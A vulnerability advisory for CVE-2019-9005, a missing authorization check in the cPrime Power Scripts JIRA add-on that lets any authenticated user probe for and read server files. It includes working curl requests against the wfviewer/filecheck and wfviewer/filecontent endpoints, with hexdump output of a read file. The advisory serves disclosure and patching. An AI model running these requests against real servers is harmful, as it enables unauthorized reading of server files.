cve-2019-9005

Improper Authorizations / Path Traversal Vulnerability in cPrime Power Scripts for JIRA

Title

Improper Authorizations / Path Traversal Vulnerability in cPrime Power Scripts for JIRA

Product

cPrime Power Scripts

Vulnerable Version

< 4.0.14

Fixed Version

4.0.14

CVE Number

CVE-2019-9005

Impact

Critical

Homepage

https://www.cprime.com/technology/power-scripts/Credits

Credits

Cosmin Botin (Detack GmbH)
Felix Wallaschek (Detack GmbH)

The JIRA addon Power Scripts by cPrime was affected by improper authorizations, allowing any JIRA user to probe for and read arbitrary files from the underlaying server file system. The vendor provides patched versions of the addon.

 

Product Description

Power Scripts (formerly JJupin) provides versatile scripting capabilities and virtually unlimited power to enhance and automate your most complex JIRA workflows. With Power Scripts, you can effortlessly harness the full power of JIRA without any technical JIRA knowledge. Manipulate JIRA UI, access unlimited databases or any back-office system, specify custom workflow post functions and validators, and so much more!

Source: https://www.cprime.com/technology/power-scripts/

Vulnerability Description

The Power Scripts addon implements a REST API which offers several endpoints for different functionalities. The wfviewer/filecheck and wfviewer/filecontent endpoints, which are used by administrators to check and read local files were found to not check the authorization of the calling user, allowing any authenticated user to probe for and read files from the JIRA server filesystem.

 

Proof of Concept

File Probing:

curl -s -u <user>:<password> "http://jira.server.intern/rest/keplerrominfo/jjupin/2.0/wfviewer/filecheck?path=c%3A%2FWindows%2Fwin.ini&_=1514764800000"  
{"id":9}

File Reading:

curl -s -u <user>:<password> "http://jira.server.intern/rest/keplerrominfo/jjupin/2.0/wfviewer/filecontent?path=c%3A%2FWindows%2Fwin.ini&_=1514764800000"  | hexdump -C
00000000  3b 20 66 6f 72 20 31 36  2d 62 69 74 20 61 70 70  |; for 16-bit app|
00000010  20 73 75 70 70 6f 72 74  0d 3c 62 72 3e 5b 66 6f  | support.<br>[fo|
00000020  6e 74 73 5d 0d 3c 62 72  3e 5b 65 78 74 65 6e 73  |nts].<br>[extens|
00000030  69 6f 6e 73 5d 0d 3c 62  72 3e 5b 6d 63 69 20 65  |ions].<br>[mci e|
00000040  78 74 65 6e 73 69 6f 6e  73 5d 0d 3c 62 72 3e 5b  |xtensions].<br>[|
00000050  66 69 6c 65 73 5d 0d 3c  62 72 3e 5b 4d 61 69 6c  |files].<br>[Mail|
00000060  5d 0d 3c 62 72 3e 4d 41  50 49 3d 31 0d 3c 62 72  |].<br>MAPI=1.<br|
00000070  3e                                                |>|
00000071

 

Solution / Workaround

It is recommended to update the Power Scripts addon to the latest available version.